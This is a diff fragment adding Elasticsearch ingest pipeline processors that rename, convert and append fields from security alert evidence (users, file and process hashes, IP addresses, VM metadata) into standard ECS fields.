+ processor:
+ rename:
+ field: _ingest._value.healthStatus
+ tag: rename_foreach_evidence_healthStatus
+ target_field: _ingest._value.health_status
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: double_foreach_evidence__rename_accountName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ foreach:
+ field: _ingest._value.loggedOnUsers
+ tag: inside_foreach_evidence_loggedOnUSers_rename_accountName
+ ignore_missing: true
+ processor:
+ rename:
+ field: _ingest._value.accountName
+ tag: rename_foreach_evidence_accountName
+ target_field: _ingest._value.account_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: double_foreach_evidence_append_loggedOnUsers_account_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ foreach:
+ field: _ingest._value.loggedOnUsers
+ tag: inside_foreach_append_loggedOnUsers_account_name
+ ignore_missing: true
+ processor:
+ append:
+ field: related.user
+ tag: append_inside_foreach_loggedOnUsers_account_name
+ value: '{{{_ingest._value.account_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: double_foreach_evidence_rename_loggedOnUsers_domainName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ foreach:
+ field: _ingest._value.loggedOnUsers
+ tag: inside_foreach_rename_loggedOnUsers_domainName
+ ignore_missing: true
+ processor:
+ rename:
+ field: _ingest._value.domainName
+ tag: rename_foreach_loggedOnUsers_domainName
+ target_field: _ingest._value.domain_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: double_foreach_evidence_loggedOnUsers_append_domain_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ foreach:
+ field: _ingest._value.loggedOnUsers
+ tag: inside_foreach_loggedOnUsers_append_domainName
+ ignore_missing: true
+ processor:
+ append:
+ field: related.hosts
+ tag: append_inside_foreach_loggedOnUsers_domainName
+ value: '{{{_ingest._value.domain_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: double_foreach_evidence_loggedOnUsers_dot_expander_@odata_type
+ if: ctx.json?.evidence instanceof List
+ processor:
+ foreach:
+ field: _ingest._value.loggedOnUsers
+ tag: inside_foreach_dot_expander_loggedOnUsers
+ ignore_missing: true
+ processor:
+ dot_expander:
+ field: '@odata.type'
+ path: _ingest._value
+ ignore_failure: true
+ override: true
+ - foreach:
+ field: json.evidence
+ tag: double_foreach_evidence_loggedOnUsers_rename_@odata_type
+ if: ctx.json?.evidence instanceof List
+ processor:
+ foreach:
+ field: _ingest._value.loggedOnUsers
+ tag: inside_foreach_loggedOnUsers_rename_@odata_type
+ ignore_missing: true
+ processor:
+ rename:
+ field: _ingest._value.@odata.type
+ tag: rename_evidence_foreach_loggedOnUsers_@odata_type
+ target_field: _ingest._value.odata_type
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_loggedOnUsers
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.loggedOnUsers
+ target_field: _ingest._value.logged_on_users
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_onboardingStatus_rename
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.onboardingStatus
+ target_field: _ingest._value.onboarding_status
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_osBuild
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.osBuild
+ tag: convert_foreach_evidence_osBuild
+ target_field: _ingest._value.os_build
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.osBuild
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_rbacGroupId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.rbacGroupId
+ tag: convert_foreach_evidence_rbacGroupId
+ target_field: _ingest._value.rbac_group.id
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.rbacGroupId
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_rename_evidence_rbacGroupName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.rbacGroupName
+ tag: rename_foreach_evidence_rbacGroupName
+ target_field: _ingest._value.rbac_group.name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_riskScore
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.riskScore
+ tag: rename_foreach_evidence_riskScore
+ target_field: _ingest._value.risk_score
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_dot_expander_vmMetadata
+ if: ctx.json?.evidence instanceof List
+ processor:
+ dot_expander:
+ field: '@odata.type'
+ path: _ingest._value.vmMetadata
+ ignore_failure: true
+ override: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_vmMetadata_@odata_type
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.vmMetadata.@odata.type
+ tag: rename_foreach_evidence_vmMetadata_@odata_type
+ target_field: _ingest._value.vm_metadata.odata_type
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_vmMetadata_resourceId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.vmMetadata.resourceId
+ tag: rename_foreach_evidence_vmMetadata_resourceId
+ target_field: _ingest._value.vm_metadata.resource_id
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_vmMetadata_subscriptionId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.vmMetadata.subscriptionId
+ tag: rename_foreach_evidence_vmMetadata_subscriptionId
+ target_field: _ingest._value.vm_metadata.subscription_id
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_vmMetadata_vmId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.vmMetadata.vmId
+ tag: rename_foreach_evidence_vmMetadata_vmId
+ target_field: _ingest._value.vm_metadata.vm_id
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_detectionStatus
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.detectionStatus
+ tag: rename_foreach_evidence_detectionStatus
+ target_field: _ingest._value.detection_status
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_detection_status
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: event.action
+ tag: append_foreach_evidence_detection_status
+ value: '{{{_ingest._value.detection_status}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_dot_expander_fileDetails
+ if: ctx.json?.evidence instanceof List
+ processor:
+ dot_expander:
+ field: '@odata.type'
+ path: _ingest._value.fileDetails
+ ignore_failure: true
+ override: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_fileDetails_@odata_type
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.@odata.type
+ tag: rename_foreach_evidence_fileDetails_@odata_type
+ target_field: _ingest._value.file_details.odata_type
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_fileDetails_sha1
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.sha1
+ tag: rename_foreach_evidence_fileDetails_sha1
+ target_field: _ingest._value.file_details.sha1
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_fileDetails_sha1_into_fileHashSha1
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: file.hash.sha1
+ tag: append_foreach_evidence_fileDetails_sha1_into_fileHashSha1
+ value: '{{{_ingest._value.file_details.sha1}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_fileDetails_sha1_into_related_hash
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hash
+ tag: append_foreach_evidence_fileDetails_sha1_into_related_hash
+ value: '{{{_ingest._value.file_details.sha1}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_fileDetails_sha256
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.sha256
+ tag: rename_foreach_evidence_fileDetails_sha256
+ target_field: _ingest._value.file_details.sha256
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_filedetails_sha256_into_file_hash_sha256
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: file.hash.sha256
+ tag: append_foreach_evidence_filedetails_sha256_into_file_hash_sha256
+ value: '{{{_ingest._value.file_details.sha256}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_filedetails_sha256_into_related_hash
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hash
+ tag: append_foreach_evidence_filedetails_sha256_into_related_hash
+ value: '{{{_ingest._value.file_details.sha256}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_fileDetails_fileName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.fileName
+ tag: rename_foreach_evidence_fileDetails_FileName
+ target_field: _ingest._value.file_details.name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_fileDetails_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: file.name
+ tag: append_foreach_evidence_fileDetails_name
+ value: '{{{_ingest._value.file_details.name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_fileDetails_filePath
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.filePath
+ tag: rename_foreach_evidence_fileDetails_filePath
+ target_field: _ingest._value.file_details.path
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_fileDetails_path
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: file.path
+ tag: append_foreach_evidence_fileDetails_path
+ value: '{{{_ingest._value.file_details.path}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_fileSize
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.fileDetails.fileSize
+ tag: convert_foreach_evidence_fileSize
+ target_field: _ingest._value.file_details.size
+ type: long
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.fileDetails.fileSize
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_filePublisher
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.filePublisher
+ tag: rename_foreach_evidence_filePublisher
+ target_field: _ingest._value.file_details.publisher
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_issuer
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.issuer
+ tag: rename_foreach_evidence_issuer
+ target_field: _ingest._value.file_details.issuer
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_signer
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.fileDetails.signer
+ tag: rename_evidence_foreach_signer
+ target_field: _ingest._value.file_details.signer
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_ipAddress
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.ipAddress
+ tag: convert_foreach_evidence_ipAddress
+ target_field: _ingest._value.ip_address
+ type: ip
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.ipAddress
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_ip_address_into_host_ip
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: host.ip
+ tag: append_foreach_evidence_ip_address_into_host_ip
+ value: '{{{_ingest._value.ip_address}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_ip_address_into_related_ip
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.ip
+ tag: append_foreach_evidence_ip_address_into_related_ip
+ value: '{{{_ingest._value.ip_address}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_dot_expander_userAccount
+ if: ctx.json?.evidence instanceof List
+ processor:
+ dot_expander:
+ field: '@odata.type'
+ path: _ingest._value.userAccount
+ ignore_failure: true
+ override: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_userAccount_odata_type
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.userAccount.@odata.type
+ tag: renane_foreach_evidence_userAccount_odata_type
+ target_field: _ingest._value.user_account.odata_type
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_useraccount_domainName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.userAccount.domainName
+ tag: rename_foreach_evidence_useraccount_domainName
+ target_field: _ingest._value.user_account.domain_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_useraccount_domain_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hosts
+ tag: append_foreach_evidence_useraccount_domain_name
+ value: '{{{_ingest._value.user_account.domain_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_useraccount_azureAdUserId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.userAccount.azureAdUserId
+ tag: rename_foreach_evidence_useraccount_azureAdUserId
+ target_field: _ingest._value.user_account.azure_ad_user_id
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_useraccount_azureAdUserId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.user
+ tag: append_foreach_evidence_useraccount_azureAdUserId
+ value: '{{{_ingest._value.user_account.azure_ad_user_id}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_useraccount_userPrincipalName
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.userAccount.userPrincipalName
+ tag: rename_foreach_evidence_useraccount_userPrincipalName
+ target_field: _ingest._value.user_account.user_principal_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_useraccount_user_principal_name
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.user
+ tag: append_foreach_evidence_useraccount_user_principal_name
+ value: '{{{_ingest._value.user_account.user_principal_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_primaryAddress
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.primaryAddress
+ tag: rename_foreach_evidence_primaryAddress
+ target_field: _ingest._value.primary_address
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_useraccount_accountname
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.userAccount.accountName
+ tag: rename_foreach_evidence_useraccount_accountname
+ target_field: _ingest._value.user_account.account_name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_useraccount_accountname
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.user
+ tag: append_foreach_evidence_useraccount_accountname
+ value: '{{{_ingest._value.user_account.account_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_useraccount_userSid
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.userAccount.userSid
+ tag: rename_foreach_evidence_useraccount_userSid
+ target_field: _ingest._value.user_account.user_sid
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_useraccount_userSid
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.user
+ tag: append_foreach_evidence_useraccount_userSid
+ value: '{{{_ingest._value.user_account.user_sid}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_clusterBy
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.clusterBy
+ tag: rename_foreach_evidence_clusterBy
+ target_field: _ingest._value.cluster_by
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_ename_clusterByValue
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.clusterByValue
+ tag: rename_evidence_foreach_clusterByValue
+ target_field: _ingest._value.cluster_by_value
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_emailCount
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.emailCount
+ tag: convert_foreach_evidence_emailCount
+ target_field: _ingest._value.email_count
+ type: long
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.emailCount
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_networkMessageIds
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.networkMessageIds
+ tag: rename_foreach_evidence_networkMessageId
+ target_field: _ingest._value.network_message_ids
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_rename_evidence_objectId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.objectId
+ tag: rename_foreach_evidence_objectId
+ target_field: _ingest._value.object_id
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_processCommandLine
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.processCommandLine
+ tag: rename_foreach_evidence_processCommandLine
+ target_field: _ingest._value.process.command_line
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_processCommandLine
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: process.command_line
+ tag: append_foreach_evidence_processCommandLine
+ value: '{{{_ingest._value.process.command_line}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_dot_expander_imageFile
+ if: ctx.json?.evidence instanceof List
+ processor:
+ dot_expander:
+ field: '@odata.type'
+ path: _ingest._value.imageFile
+ ignore_failure: true
+ override: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_imageFile_@odata_type
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.@odata.type
+ tag: rename_foreach_evidence_imageFile_@odata_type
+ target_field: _ingest._value.image_file.odata_type
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_imagefile_sha1
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.sha1
+ tag: rename_foreach_evidence_imagefile_sha1
+ target_field: _ingest._value.image_file.sha1
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_imagefile_sha1_into_process_hash_sha1
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: process.hash.sha1
+ tag: append_foreach_evidence_imagefile_sha1_into_process_hash_sha1
+ value: '{{{_ingest._value.image_file.sha1}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_imagefile_sha1_into_related_hash
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hash
+ tag: append_foreach_evidence_imagefile_sha1_into_related_hash
+ value: '{{{_ingest._value.image_file.sha1}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_imagefile_sha256
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.sha256
+ tag: foreach_evidence_rename_imagefile_sha256
+ target_field: _ingest._value.image_file.sha256
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_imagefile_sha256_into_process_hash_sha256
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: process.hash.sha256
+ tag: append_foreach_evidence_imagefile_sha256_into_process_hash_sha256
+ value: '{{{_ingest._value.image_file.sha256}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_imagefile_sha256_into_related_hash
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hash
+ tag: append_foreach_evidence_imagefile_sha256_into_related_hash
+ value: '{{{_ingest._value.image_file.sha256}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_dot_expander_parentProcessImageFile
+ if: ctx.json?.evidence instanceof List
+ processor:
+ dot_expander:
+ field: '@odata.type'
+ path: _ingest._value.parentProcessImageFile
+ ignore_failure: true
+ override: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_parentProcessImageFile_@odata_type
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.parentProcessImageFile.@odata.type
+ tag: rename_foreach_evidence_parentProcessImageFile_@odata_type
+ target_field: _ingest._value.parent_process.image_file.odata_type
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_parentProcessImageFile_sha1
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.parentProcessImageFile.sha1
+ tag: rename_foreach_evidence_parentProcessImageFile_sha1
+ target_field: _ingest._value.parent_process.image_file.sha1
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_parentProcessImageFile_sha1_into_process_parent_hash_sha1
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: process.parent.hash.sha1
+ tag: append_foreach_evidence_parentProcessImageFile_sha1_into_process_parent_hash_sha1
+ value: '{{{_ingest._value.parent_process.image_file.sha1}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_parentProcessImageFile_sha1_into_related_hash
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hash
+ tag: append_foreach_evidence_parentProcessImageFile_sha1_into_related_hash
+ value: '{{{_ingest._value.parent_process.image_file.sha1}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_parentProcessImageFile_sha256
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.parentProcessImageFile.sha256
+ tag: rename_foreach_evidence_parentProcessImageFile_sha256
+ target_field: _ingest._value.parent_process.image_file.sha256
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_parentProcessImageFile_sha256_into_process_parent_hash_sha256
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: process.parent.hash.sha256
+ tag: append_foreach_evidence_parentProcessImageFile_sha256_into_process_parent_hash_sha256
+ value: '{{{_ingest._value.parent_process.image_file.sha256}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_parentProcessImageFile_sha256_into_related_hash
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: related.hash
+ tag: append_foreach_evidence_parentProcessImageFile_sha256_into_related_hash
+ value: '{{{_ingest._value.parent_process.image_file.sha256}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_parentProcessId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.parentProcessId
+ tag: convert_foreach_evidence_parentProcessId
+ target_field: _ingest._value.parent_process.id
+ type: long
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.parentProcessId
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_date_parentProcessCreationDateTime
+ if: ctx.json?.evidence instanceof List
+ processor:
+ date:
+ field: _ingest._value.parentProcessCreationDateTime
+ tag: date_foreach_evidence_parentProcessCreationDateTime
+ target_field: _ingest._value.parent_process.creation_datetime
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.parentProcessCreationDateTime
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_parentProcessCreationDateTime
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: process.parent.start
+ tag: append_foreach_evidence_parentProcessCreationDateTime
+ value: '{{{_ingest._value.parent_process.creation_datetime}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_processId
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.processId
+ tag: convert_foreach_evidence_processId
+ target_field: _ingest._value.process.id
+ type: long
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.processId
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_date_processCreationDateTime
+ if: ctx.json?.evidence instanceof List
+ processor:
+ date:
+ field: _ingest._value.processCreationDateTime
+ tag: date_foreach_evidence_processCreationDateTime
+ target_field: _ingest._value.process.creation_datetime
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.processCreationDateTime
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_append_processCreationDateTime
+ if: ctx.json?.evidence instanceof List
+ processor:
+ append:
+ field: process.start
+ tag: append_foreach_evidence_processCreationDateTime
+ value: '{{{_ingest._value.process.creation_datetime}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_imageFile_filename
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.fileName
+ tag: rename_foreach_evidence_imageFile_filename
+ target_field: _ingest._value.image_file.name
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_imageFile_filepath
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.filePath
+ tag: rename_foreach_evidence_imageFile_filepath
+ target_field: _ingest._value.image_file.path
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_imageFile_filePublisher
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.filePublisher
+ tag: rename_foreach_evidence_imageFile_filePublisher
+ target_field: _ingest._value.image_file.publisher
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_convert_imagefile_filesize
+ if: ctx.json?.evidence instanceof List
+ processor:
+ convert:
+ field: _ingest._value.imageFile.fileSize
+ tag: convert_foreach_evidence_imagefile_filesize
+ target_field: _ingest._value.image_file.size
+ type: long
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.imageFile.fileSize
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_imagefile_issuer
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.issuer
+ tag: rename_foreach_evidence_imagefile_issuer
+ target_field: _ingest._value.image_file.issuer
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_imageFile_signer
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.imageFile.signer
+ tag: rename_foreach_evidence_imageFile_signer
+ target_field: _ingest._value.image_file.signer
+ ignore_missing: true
+ - foreach:
+ field: json.evidence
+ tag: foreach_evidence_rename_parentProcessImageFile_filename
+ if: ctx.json?.evidence instanceof List
+ processor:
+ rename:
+ field: _ingest._value.parentProcessImageFile.fileName
+ tag: rename_foreach_evidence_parentProcessImageFile_filename
